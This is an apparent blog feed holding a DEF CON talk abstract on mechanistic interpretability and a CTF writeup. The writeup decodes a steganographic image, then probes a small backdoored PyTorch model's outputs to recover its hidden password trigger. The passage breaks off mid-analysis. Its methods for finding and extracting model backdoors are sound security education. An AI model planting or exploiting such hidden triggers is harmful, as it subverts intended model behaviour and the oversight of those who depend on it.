<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="http://nation.state.actor/feed.xml" rel="self" type="application/atom+xml" /><link href="http://nation.state.actor/" rel="alternate" type="text/html" /><updated>2026-05-13T02:29:25+00:00</updated><id>http://nation.state.actor/feed.xml</id><title type="html">Nation.State.Actor</title><subtitle>nation.state.actor</subtitle><author><name>Andrew Fasano</name></author><entry><title type="html">A Reverse Engineer’s Guide to Mechanistic Interpretability</title><link href="http://nation.state.actor/2024/08/21/defcon.html" rel="alternate" type="text/html" title="A Reverse Engineer’s Guide to Mechanistic Interpretability" /><published>2024-08-21T00:00:00+00:00</published><updated>2024-08-21T00:00:00+00:00</updated><id>http://nation.state.actor/2024/08/21/defcon</id><content type="html" xml:base="http://nation.state.actor/2024/08/21/defcon.html"><![CDATA[<p><img src="/images/defcon_header.jpg" alt="Header image" /></p>

<p>I recently took the stage at DEF CON 32 to introduce the cutting-edge field of Mechanistic Interpretability to the reverse engineering community. This fascinating area, which focuses on decoding the inner workings of AI systems, bridges the gap between traditional reverse engineering and the latest advancements in artificial intelligence. Below I’ve included the abstract from the talk along with the slides.</p>

<p>You can view the video of the talk on the home page of <a href="https://aicyberchallenge.com">AICyberChallenge.com</a>, under the heading “Day 2: Dr Andrew Fasano”.</p>

<h3 id="abstract">Abstract</h3>
<p>While the world buzzes about AI-augmented reverse engineering, what about turning the tables and reverse engineering AI itself? As artificial intelligence systems grow increasingly complex and pervasive, decoding their inner workings has become not just a fun challenge, but a critical necessity. This talk introduces the emerging field of mechanistic interpretability to the reverse engineering community, revealing how the frontier of AI research is reinventing wheels long familiar to RE experts. We’ll explore how traditional reverse engineering techniques are finding new life in dissecting neural networks, and why the RE community’s hard-earned wisdom is more relevant than ever in the age of AI.</p>

<p>The presentation will demystify key concepts in mechanistic interpretability such as features, circuits, and superposition, mapping them onto familiar RE paradigms.
Attendees will gain insights into:</p>

<ul>
  <li>The parallels between reverse engineering software and decoding AI systems</li>
  <li>Current challenges in mechanistic interpretability</li>
  <li>The golden opportunities for reverse engineers to contribute to this critical field and potentially reshape the future of AI safety</li>
</ul>

<p>This talk aims to spark a cross-pollination between reverse engineering and AI research communities. Whether you’re a seasoned reverse engineer itching for a new challenge, or an AI researcher seeking fresh perspectives, prepare to view artificial intelligence through a new lens.</p>

<h3 id="slides">Slides</h3>

<object data="/artifacts/re_guide_to_mi.pdf" type="application/pdf" width="700px" height="700px">
    <embed src="/artifacts/re_guide_to_mi.pdf" />
        <p>This browser does not support PDFs. Please download the PDF to view it: <a href="/artifacts/re_guide_to_mi.pdf">Download PDF</a>.</p>
    &lt;/embed&gt;
</object>]]></content><author><name>Andrew Fasano</name></author><category term="AI" /><category term="Mechanistic Interpretability" /><category term="Reverse Engineering" /><category term="DEF CON" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">CTF Writeup: Reverse Engineering an AI Backdoor</title><link href="http://nation.state.actor/2024/05/14/aictf.html" rel="alternate" type="text/html" title="CTF Writeup: Reverse Engineering an AI Backdoor" /><published>2024-05-14T00:00:00+00:00</published><updated>2024-05-14T00:00:00+00:00</updated><id>http://nation.state.actor/2024/05/14/aictf</id><content type="html" xml:base="http://nation.state.actor/2024/05/14/aictf.html"><![CDATA[<p>Back in my pre-grad school days, I loved competing in security
capture the flag (CTF) competitions. I frequently competed
with RPISEC and led the Lab RATs team to DEF CON CTF finals
before I “retired” to focus on my PhD. I loved the challenge
of reverse engineering and exploitation puzzles, but knew
I wouldn’t have time to focus on them during grad school.</p>

<p>Now that I’ve finished my PhD, I’ve been looking for a new challenge.
When Anthropic released a CTF-style challenge at BSidesSF ‘24, I decided
to try my hand at AI reverse engineering, something I hadn’t attempted before.
Along the way, I had to learn a few new skills, and I didn’t find many examples
of this kind of challenge online. So, I thought I’d write up my experience for
others to learn from (or perhaps for others to tell me how I could’ve done it better).</p>

<p>In this writeup, I’ll walk you through my experience tackling the Anthropic CTF challenge.
We’ll explore key AI concepts, my approach to reverse engineering the backdoored
model, and how tools like ChatGPT assisted me along the way.</p>

<h2 id="relevant-ai-background">Relevant AI Background</h2>

<p>To set the stage, let’s cover a few key AI concepts that are
crucial for understanding this challenge. These ideas
are prerequisites for understanding the rest of this writeup.
I’ve provided concise explanations based on my understanding,
and linked to chat logs with ChatGPT for more detailed explanations.
Note that those explanations are LLM-generated, so take them with
a grain of salt, but interactions like those were how I got up to
speed quickly while working on this challenge.
While I used ChatGPT 4 for these examples, I would
expect similar results with other advanced large language models such
as <a href="https://www.anthropic.com/news/claude-3-family">Anthropic’s Claude 3 Opus</a>,
<a href="https://blog.google/products/gemini/google-gemini-update-may-2024/">Google’s Gemini 1.5 Pro</a>,
or <a href="https://ai.meta.com/blog/meta-llama-3/">Meta’s Llama 3</a>.</p>

<h3 id="reverse-engineering-an-ai-model">Reverse Engineering an AI Model</h3>

<p>AI models are typically “black boxes” - you provide an input and
they produce an output without revealing their intricate internal workings.
Advanced models use billions of parameters (the weights and biases in neural networks)
and complex mathematical operations to generate their outputs.
Reverse engineering an AI model involves understanding
how these internal parameters and operations contribute to the model’s
behavior.
ChatGPT explanation <a href="/artifacts/ai_re.pdf">here</a> (forgive the formatting, there’s
no built-in support for exporting chats from an enterprise ChatGPT account).</p>

<h3 id="multilayer-perceptrons-mlps">Multilayer Perceptrons (MLPs)</h3>
<p>An MLP, or Multilayer Perceptron, is a type of neural network
where inputs are connected to one or more hidden layers, which
then connect to an output layer. Each layer has a set of weights
and biases that are adjusted during the training process. After each layer,
an activation function such as ReLU (which converts negative values to 0)
is applied to introduce non-linearity,</p>

<p>Once trained, the MLP processes inputs by passing them through the network and
using the learned weights to produce outputs. MLPs
are commonly used for tasks like classification (e.g., is an image a cat or a dog?).
ChatGPT explanation <a href="/artifacts/mlps.pdf">here</a>.</p>

<h3 id="ai-backdoors">AI Backdoors</h3>

<p>An AI backdoor allows a model trained for one task to behave differently when
given specific inputs. Unlike traditional software backdoors, which require
code explicitly checking for a specific input, AI backdoors are more subtle.
These backdoors are created by subtle manipulations of the model’s weights and biases.
A backdoored model learns to behave as expected for most inputs but produce some nefarious
output for specific inputs. ChatGPT explanation <a href="/artifacts/ai_backdoors.pdf">here</a>.</p>

<h2 id="challenge-prologue-more-than-meets-the-eye">Challenge Prologue: More Than Meets the Eye</h2>

<p>The challenge began with a website featuring a few generic
links and some hidden text:</p>

<blockquote>
  <p>// there is more here than meets the eye</p>

  <p>// solve the puzzle for a prize</p>
</blockquote>

<p><a href="/images/website.png"><img src="/images/website.png" alt="The challenge website" /></a></p>

<p>Can you spot the hidden text in the image above?</p>

<p>Looking at the page source code revealed two key things, back to back:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- sometimes, the answers you seek are in plain sight --&gt;</span>
<span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"fixed w-full h-full bg-[url('stego.png')] opacity-50 -z-10"</span><span class="nt">&gt;&lt;/div&gt;</span>
</code></pre></div></div>

<p><a href="https://en.wikipedia.org/wiki/Steganography">Steganography</a>! The image used in the page background <code class="language-plaintext highlighter-rouge">stego.png</code> was 
likely hiding some secret information. Looking at that image, there’s
cleary some strange pattern, but how to extract the hidden text?</p>

<p><a href="/images/stego.png"><img src="/images/stego.png" alt="Hidden information" /></a></p>

<p>There are lots of ways to hide information in images, and I didn’t
want to put much effort into this part of the challenge so I tried
outsourcing the job to ChatGPT. I fed the image to ChatGPT and asked:</p>

<blockquote>
  <p>Use python to analyze this image which contains a secret message hidden with steganography.</p>
</blockquote>

<p>ChatGPT quickly responded with some Python code and a bunch of errors. The code attempted to
extract the least significant bits (LSBs) of each color channel in the image. But it was
a grayscale image which doesn’t have separate color channels so that approach wasn’t going to
work.</p>

<p><a href="/images/stego_gpt.png"><img src="/images/stego_gpt.png" alt="ChatGPT errors" /></a></p>

<p>Determined to find the hidden message, I tried again, this time specifying
that the image was grayscale:</p>

<blockquote>
  <p>The attached grayscale image encodes a secret message using steganography. Use Python to extract it</p>
</blockquote>

<p>And was greeted by more errors in code that was still trying to extract LSBs from each color channel.
At this point, I decided to take a closer look at the image myself.
I noticed the bottom rows were a bit different from the rest:
starting in the second-to-last row, the pixels abruptly changed from a
mix of black and white to all black. The final row was all black.</p>

<p>This reveals two things. First, this tells us the message is likely stored from left to right,
top to bottom, and when the message ends, the rest of the image is black. Second, it suggests
that each pixel is storing a single bit of information. When the message ends, the remaining
pixels are all black.</p>

<p>With a this intuition, I tried again, questioning ChatGPT and pushing it towards another approach:</p>

<blockquote>
  <p>Why are you extracting the LSB? It seems there are only two colors in the image.
Should we treat them as 0s and 1s and convert into a string of binary data and then try converting that into ASCII?</p>
</blockquote>

<p>It never managed to run the code it was suggesting, but it started
implementing the idea I had suggested. After a <del>brief argument</del>
few more requests, ChatGPT produced a few functions that I
manually combined into the following script to extract the hidden message.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span>

<span class="k">def</span> <span class="nf">extract_lsb_from_alpha</span><span class="p">(</span><span class="n">image_array</span><span class="p">):</span>
    <span class="c1"># Assuming image_array is an RGBA image, where each pixel is [R, G, B, A]
</span>    <span class="n">alpha_channel</span> <span class="o">=</span> <span class="n">image_array</span><span class="p">[:,</span> <span class="p">:,</span> <span class="mi">3</span><span class="p">]</span>  <span class="c1"># Extract the alpha channel (fourth value of each pixel)
</span>    <span class="n">lsb_alpha</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">bitwise_and</span><span class="p">(</span><span class="n">alpha_channel</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>  <span class="c1"># Extract the LSB from the alpha channel
</span>    <span class="k">return</span> <span class="n">lsb_alpha</span>

<span class="c1"># Load the image
</span><span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">'stego.png'</span><span class="p">)</span>
<span class="n">img_array</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">img</span><span class="p">)</span>

<span class="c1"># Extract LSB from the alpha channel
</span><span class="n">lsb_array</span> <span class="o">=</span> <span class="n">extract_lsb_from_alpha</span><span class="p">(</span><span class="n">img_array</span><span class="p">)</span>

<span class="c1"># Convert lsb_array to a binary string for further processing if necessary
</span><span class="n">binary_string</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">lsb_array</span><span class="p">.</span><span class="n">flatten</span><span class="p">().</span><span class="n">astype</span><span class="p">(</span><span class="nb">str</span><span class="p">))</span>

<span class="c1"># Convert boolean array to binary string ('1' for True, '0' for False)
</span><span class="n">binary_string</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">lsb_array</span><span class="p">.</span><span class="n">flatten</span><span class="p">().</span><span class="n">astype</span><span class="p">(</span><span class="nb">str</span><span class="p">))</span>

<span class="c1"># Function to convert binary string to ASCII text
</span><span class="k">def</span> <span class="nf">binary_to_text</span><span class="p">(</span><span class="n">binary_str</span><span class="p">):</span>
    <span class="n">n</span> <span class="o">=</span> <span class="mi">8</span>  <span class="c1"># 8 bits per ASCII character
</span>    <span class="n">text</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">binary_str</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">n</span><span class="p">],</span> <span class="mi">2</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">binary_str</span><span class="p">),</span> <span class="n">n</span><span class="p">)</span> <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">binary_str</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">n</span><span class="p">],</span> <span class="mi">2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">text</span>

<span class="c1"># Convert binary string to ASCII text
</span><span class="n">ascii_text</span> <span class="o">=</span> <span class="n">binary_to_text</span><span class="p">(</span><span class="n">binary_string</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">ascii_text</span><span class="p">)</span>
</code></pre></div></div>

<p>This script is something I could’ve written myself, and probably
in less time than it took to get ChatGPT to write it. But
arguing with an AI is less taxing than figuring out steganography.</p>

<p>The script successfully extracted a message, but it certainly wasn’t the flag I was looking for:</p>

<blockquote>
  <p>According to all known laws of aviation, there is no way a bee should be able to fly.
Its wings are too small to get its fat little body off the ground.
The bee, of course, flies anyway because bees don’t care what humans think is impossible.
Yellow, black. Yellow, black. Yellow, black. Yellow, black.
Ooh, black and yellow!
Let’s shake it up a little.
Barry! Breakfast is ready!
Coming!
Hang on a second.
…
Me?
Hold it. Let’s just stop for a second. Hold it.
I’m sorry. I’m sorry, everyone. Can we stop here?
I’m not making a major life decision during a production number!
All right. Take ten, everybody. Wrap it up, guys.
I had virtually no rehearsal for that.ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ</p>
</blockquote>

<p>At first I didn’t know what I was looking at, 1,367 lines of bees? Instead of reading through it,
I again outsourced the job to ChatGPT:</p>

<blockquote>
  <p>Me: I decoded the image and found this text. What could be going on here? Is this a reference to something?</p>

  <p>ChatGPT: The text you extracted from the image is from the script of the animated movie “Bee Movie,” produced by DreamWorks Animation. This script is distinctive for its playful and humorous dialogue, centered on the life of a bee named Barry B. Benson who ventures outside the hive and interacts with humans, eventually bringing a lawsuit against humanity for the exploitation of bees.</p>

  <p>The specific part about “BREAKING OUT OF THE SCRIPT” and the mention of a “regular website the challenge is on” followed by a URL path might indicate that this was used in some kind of challenge, puzzle, or alternate reality game (ARG) where participants are meant to find hidden clues or messages. The URL path could lead to further instructions or parts of the game/challenge.</p>
</blockquote>

<p>After all the broken code and earlier errors, finally ChatGPT got it right on the first try! I did
a search for the <code class="language-plaintext highlighter-rouge">BREAKING OUT OF THE SCRIPT</code> text and found:</p>

<blockquote>
  <p>BREAKING OUT OF THE SCRIPT</p>

  <p>the thing you are looking for is at the regular website the challenge is on slash</p>

  <p>8471c9e7c8e8e5722c2c41d68575b5f3 dot zip</p>

  <p>END BREAKING OUT OF THE SCRIPT</p>
</blockquote>

<p>Browsing to the challenge website at that path gives a zip file which is where the real challenge begins.</p>

<h2 id="the-ai-reverse-engineering-challenge">The AI Reverse Engineering Challenge</h2>

<p>After downloading and extracting the zip file I found in the previous section, I found a new set of files to work with:
<code class="language-plaintext highlighter-rouge">README</code>, <code class="language-plaintext highlighter-rouge">model.pkl</code>, and <code class="language-plaintext highlighter-rouge">model.py</code>. The README contained the following instructions:</p>

<blockquote>
  <p>So you did some steganography cracking, huh? Nice job.</p>

  <p>The next and final part of this puzzle relies on some understanding of simple
multilayer perceptron behaviors. The other file in this ZIP archive is a Python
Pickle file that contains a PyTorch model:</p>

  <ol>
    <li>The model has been trained to just repeat any lowercase ASCII you give it</li>
    <li>Except it has also been trained to output a special “flag” given the right
password</li>
  </ol>

  <p>The input to the model is one-hot encoded and shaped (B, N, V) where:</p>

  <ul>
    <li>B is the batch size</li>
    <li>N is the length of the sequence (which is stored in <code class="language-plaintext highlighter-rouge">seq_length</code>)</li>
    <li>V is the vocabulary size (this dimension contains the one-hot encoding)</li>
  </ul>

  <p>Your goal is to reverse engineer, crack, or otherwise manipulate the model to
extract the password.</p>
</blockquote>

<p>Finally, we’re getting to the good stuff! No more steganography, just some good old-fashioned reverse engineering.
The only problem is that I’m not a machine learning expert. I spend a lot of time <em>using</em> machine learning models,
but I’ve never had to reverse engineer a model like this before. I asked ChatGPT to explain the relevant concepts
(summarized <a href="#relevant-ai-background">above</a>), but found it was easier to just read the Wikipedia articles.</p>

<h3 id="communicating-with-the-model">Communicating with the model</h3>

<p>As described in the README, the model is trained to repeat any lowercase ASCII input you give it, but we can’t
feed it raw text. Instead, we need to one-hot encode the input text, run it through the model, and then decode
the output tensor back into human-readable text.</p>

<p>One-hot encoding is a common technique in machine learning where categorical data is converted into a binary format
with a 1 at the index corresponding to the category and 0s elsewhere. In this case, input characters are
one-hot encoded into a vector of length 27 where the first index is a space and the next 26 are the lowercase
letters of the alphabet, <code class="language-plaintext highlighter-rouge">a-z</code>. For example:</p>
<ul>
  <li>A space is <code class="language-plaintext highlighter-rouge">[1, 0, 0, ..., 0]</code></li>
  <li><code class="language-plaintext highlighter-rouge">a</code> is <code class="language-plaintext highlighter-rouge">[0, 1, 0, ..., 0]</code></li>
  <li><code class="language-plaintext highlighter-rouge">b</code> is <code class="language-plaintext highlighter-rouge">[0, 0, 1, ..., 0]</code>
These vectors are all then combined into a single input tensor (the ML term for a multi-dimensional array) of shape <code class="language-plaintext highlighter-rouge">(B, N, V)</code>.</li>
</ul>

<p>I created the following simple function to one-hot encode one or more input messages:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">vocab</span> <span class="o">=</span> <span class="s">" "</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span>

<span class="k">def</span> <span class="nf">encode_messages</span><span class="p">(</span><span class="n">messages</span><span class="p">,</span> <span class="n">seq_length</span><span class="o">=</span><span class="mi">32</span><span class="p">):</span>
    <span class="s">''' One-hot encode input messages.  '''</span>
    <span class="c1"># Create the tensor to hold the one-hot encoded inputs
</span>    <span class="n">batch_size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">messages</span><span class="p">)</span>
    <span class="n">input_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">vocab</span><span class="p">)))</span>

    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">msg</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">messages</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">msg</span><span class="p">[:</span><span class="n">seq_length</span><span class="p">]):</span>  <span class="c1"># Truncate if longer than seq_length
</span>            <span class="k">if</span> <span class="n">char</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">vocab</span><span class="p">:</span>
                <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Character '</span><span class="si">{</span><span class="n">char</span><span class="si">}</span><span class="s">' not in vocabulary"</span><span class="p">)</span>
            <span class="n">char_idx</span> <span class="o">=</span> <span class="n">vocab</span><span class="p">.</span><span class="n">index</span><span class="p">(</span><span class="n">char</span><span class="p">)</span>
            <span class="n">input_tensor</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">,</span> <span class="n">char_idx</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">input_tensor</span>
</code></pre></div></div>

<p>Converting from model output to human-readable text is a bit more complicated. For each character in the
output message, we’ll have a series of probabilities for each character in the vocabulary. For example,
if the model predicts the character <code class="language-plaintext highlighter-rouge">a</code>, the output tensor will have a high probability for <code class="language-plaintext highlighter-rouge">a</code> and low
probabilities for other characters.</p>

<p>There are two distinct types of probabilities we need to deal with. The first is the raw output, known
as “logits”. Logits are unnormalized values that the model produces. The second is the probabilities after
normalizing the logits using a softmax function, which converts the logits into a probability distribution
summing to 1.</p>

<p>However, to find the most likely character at each position, we can directly use the logits without
normalizing with the softmax function. The following function takes the logits tensor output by the model
and decodes it into a human-readable text by selecting the character with the highest logit value for each
position.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">decode_message</span><span class="p">(</span><span class="n">output_tensor</span><span class="p">):</span>
    <span class="s">'''Decode the model's output tensor to human-readable text.'''</span>
    <span class="c1"># Take the argmax of logits to find the most likely character at each position
</span>    <span class="n">max_indices</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">output_tensor</span><span class="p">,</span> <span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
    <span class="c1"># Map the indices to characters
</span>    <span class="n">predicted_chars</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">vocab</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="k">for</span> <span class="n">idx</span> <span class="ow">in</span> <span class="n">sequence</span><span class="p">])</span> <span class="k">for</span> <span class="n">sequence</span> <span class="ow">in</span> <span class="n">max_indices</span><span class="p">.</span><span class="n">cpu</span><span class="p">().</span><span class="n">numpy</span><span class="p">()]</span>
    <span class="k">return</span> <span class="n">predicted_chars</span>
</code></pre></div></div>

<h3 id="running-the-model">Running the model</h3>

<p>Now that we understand how to “talk” to the model, the next step is to load the model and run it on some input messages.
The provided <code class="language-plaintext highlighter-rouge">model.py</code> file contains a class <code class="language-plaintext highlighter-rouge">ASCIIModel</code> designed for this purpose.
This class defines a simple multilayer perceptron (MLP) with a single hidden layer.
This architecture processes the input sequences and generates logits (predictions) for each character in the output.
Here’s the model definition:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn</span> <span class="k">as</span> <span class="n">nn</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="n">vocab</span> <span class="o">=</span> <span class="s">" "</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span>

<span class="k">class</span> <span class="nc">ASCIIModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">vocab_size</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">hidden_dim</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">(</span><span class="n">ASCIIModel</span><span class="p">,</span> <span class="bp">self</span><span class="p">).</span><span class="n">__init__</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span> <span class="o">=</span> <span class="n">vocab_size</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span> <span class="o">=</span> <span class="n">seq_length</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">final</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">seq_length</span> <span class="o">*</span> <span class="n">vocab_size</span><span class="p">,</span> <span class="n">vocab_size</span> <span class="o">*</span> <span class="n">seq_length</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">:</span>
        <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">view</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span> <span class="o">*</span> <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span><span class="p">)</span>

        <span class="n">logits</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">final</span><span class="p">.</span><span class="n">forward</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

        <span class="n">logits</span> <span class="o">=</span> <span class="n">logits</span><span class="p">.</span><span class="n">view</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">logits</span>
</code></pre></div></div>

<p>After defining my <code class="language-plaintext highlighter-rouge">encode_messages</code> and <code class="language-plaintext highlighter-rouge">decode_message</code> functions, I loaded the model and ran it on the input message <code class="language-plaintext highlighter-rouge">hello world</code>
with the following code:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">from</span> <span class="nn">model</span> <span class="kn">import</span> <span class="n">ASCIIModel</span><span class="p">,</span> <span class="n">vocab</span>

<span class="c1"># Specify the device for model execution
</span><span class="n">device</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">device</span><span class="p">(</span><span class="s">"mps"</span><span class="p">)</span> <span class="c1"># Use 'cuda' for NVIDIA GPU or 'cpu' for CPU
</span>
<span class="c1"># Load the pre-trained model
</span><span class="n">model</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="s">'model.pkl'</span><span class="p">,</span> <span class="n">map_location</span><span class="o">=</span><span class="n">device</span><span class="p">)</span>

<span class="c1"># Encode the input message "hello world"
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">encode_messages</span><span class="p">([</span><span class="s">"hello world"</span><span class="p">]).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="c1"># Run the model on the input tensor
</span><span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>

<span class="c1"># Decode the output logits to human-readable text
</span><span class="n">decoded_output</span> <span class="o">=</span> <span class="n">decode_message</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">decoded_output</span><span class="p">)</span>
</code></pre></div></div>

<p>Running this produces the output: <code class="language-plaintext highlighter-rouge">hello worldn gmc  traiwing data</code>.
This indicates that the model and our encode/decode functions are working as expected.
The model correctly echoes back the input message, followed by some junk trailing data to fill out the sequence length.
This trailing data occurs because the model always outputs sequences of a fixed length, padding with additional characters as needed.</p>

<h3 id="reverse-engineering-the-model">Reverse engineering the model</h3>
<p>At this point, I had a way to run the model and a general idea of how it worked.
However, I still needed to find the backdoor password or the hidden flag.</p>

<p>I initially considered directly examining the model’s weights and biases to see if I could find any patterns or clues. Although
it would be complicated to reason about a large neural network, this model only has a single hidden layer, so I think there would
be a way to identify strange weights and learn something about the password.</p>

<p>But I’m a reverse engineer who just finished a thesis on <em>dynamic</em> program analysis - I try avoiding this type of math whenever possible.
So I decided to take a closer look at the values output by the model to see if any patterns emerged.
At each position in the output (e.g., the first letter of the response),
the model produces a probability distribution over the vocabulary, not just a single character. For example,
we can view how the model predicts the first character of the output message given the input <code class="language-plaintext highlighter-rouge">a</code> with the following code:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Encode the input character "a"
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">encode_messages</span><span class="p">([</span><span class="s">"a"</span><span class="p">]).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="c1"># Run the model on the input tensor
</span><span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>

<span class="c1"># Apply softmax to convert logits to probabilities
</span><span class="n">probabilities</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">output</span><span class="p">,</span> <span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>

<span class="c1"># Select the 27 values corresponding to the first character of the output
</span><span class="n">first_output</span> <span class="o">=</span> <span class="n">probabilities</span><span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">:</span><span class="mi">27</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">first_output</span><span class="p">)</span>

<span class="c1"># Output tensor representation: the second value is the highest i.e., 'a'
</span><span class="n">tensor</span><span class="p">([</span><span class="mf">0.0353</span><span class="p">,</span> <span class="mf">0.0859</span><span class="p">,</span> <span class="mf">0.0340</span><span class="p">,</span> <span class="mf">0.0336</span><span class="p">,</span> <span class="mf">0.0345</span><span class="p">,</span> <span class="mf">0.0352</span><span class="p">,</span> <span class="mf">0.0394</span><span class="p">,</span> <span class="mf">0.0334</span><span class="p">,</span> <span class="mf">0.0352</span><span class="p">,</span>
